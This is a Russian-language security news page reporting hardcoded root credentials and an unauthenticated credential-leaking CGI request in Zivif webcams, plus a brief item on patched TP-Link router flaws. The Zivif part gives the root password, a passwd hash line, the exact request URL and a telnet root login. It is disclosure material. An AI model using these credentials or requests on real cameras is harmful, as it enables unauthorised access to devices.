В веб-камерах Zivif обнаружен жестко закодированный рутовый пароль

В веб-камерах Zivif обнаружен жестко закодированный рутовый пароль

Веб-камеры Zivif PR115-204-P-RS V2.3.4.2103 содержат жестко закодированный пароль cat1029, использующийся для пользователя root. Настройка операционной системы SONIX делает этот пароль неизменяемым, соответственно, его можно использовать для доступа к устройству через сеанс TELNET.

Как утверждают специалисты, камерам Zivif недостает контроля доступа, в результате функции CGI можно вызывать напрямую, обходя проверки подлинности.

Проблема получила идентификатор CVE-2017-17106, заключается она в том, что камера на запрос http://<Адрес Камеры>/web/cgi-bin/hi3510/param.cgi?cmd=getuser отвечает следующим образом:

var name0="admin"; var password0="admin"; var authLevel0="255"; var
name1="guest"; var password1="guest"; var authLevel1="3"; var
name2="admin2"; var password2="admin"; var authLevel2="3"; var name3="";
var password3=""; var authLevel3="3"; var name4=""; var password4="";
var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3";
var name6=""; var password6=""; var authLevel6="3"; var name7=""; var
password7=""; var authLevel7="3"; var name8=""; var password8=""; var
authLevel8="0"; var name9=""; var password9=""; var authLevel9="0

Учетные данные возвращаются в текстовом виде.

Также эксперты отметили в файле /etc/passwd наличие жестко закодированной записи (CVE-2017-17107): 

root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh

Зашифрованный пароль - cat1029.

(none) login: root
Password:
Login incorrect
(none) login: root
Password:
Welcome to SONIX.
\[email protected]\h:\W$

Из-за того, как структурирована файловая система, изменение этого пароля составит нетривиальную задачу.

Yandex Zen AMПодписывайтесь на канал "Anti-Malware" в Yandex Zen, чтобы узнавать о новостях и эксклюзивных материалах по информационной безопасности в своей персональной ленте.

Роутеры TP-Link 1GbE затрагивают 4 уязвимости, патчи уже готовы

Исследователи в области кибербезопасности на этой неделе раскрыли детали четырех уязвимостей в маршрутизаторах TP-Link 1GbE. Проблемы безопасности были обнаружены Джаредом Риттлом и Карлом Хердом из Cisco Talos. Все четыре бреши представляют собой классику уязвимостей роутеров.

Одна из проблем — возможность провести DoS-атаку, вторая приводит к утечке файлов, а оставшиеся  бреши открывают возможность для удаленного выполнения кода (RCE).

Если говорить о степени опасности, уязвимости удаленного выполнения кода могут быть использованы только в контексте активной сессии аутентифицированного пользователя. Другими словами, только вошедший злоумышленник или вредоносная программа с необходимыми правами могут эксплуатировать эти дыры.

С другой стороны, баги присутствуют в HTTP-сервере, который используется для предоставления доступа к конфигурационному порталу. То есть он работает с правами root. Таким образом, если злоумышленник сможет использовать бреши удаленного выполнения кода, он получит полный доступ к роутеру в качестве администратора.

Другие две уязвимости не требуют аутентификации для эксплуатации. Во всех четырех случаях атакующему будет необходимо подключиться к порталу управления, однако это обычно доступно любому.

Уязвимыми являются аппаратные версии 2 и 3. В настоящее время выпущено соответствующее обновление прошивки, которое устраняет проблемы безопасности.

Yandex Zen AMПодписывайтесь на канал "Anti-Malware" в Yandex Zen, чтобы узнавать о новостях и эксклюзивных материалах по информационной безопасности в своей персональной ленте.

RSS: Новости на портале Anti-Malware.ru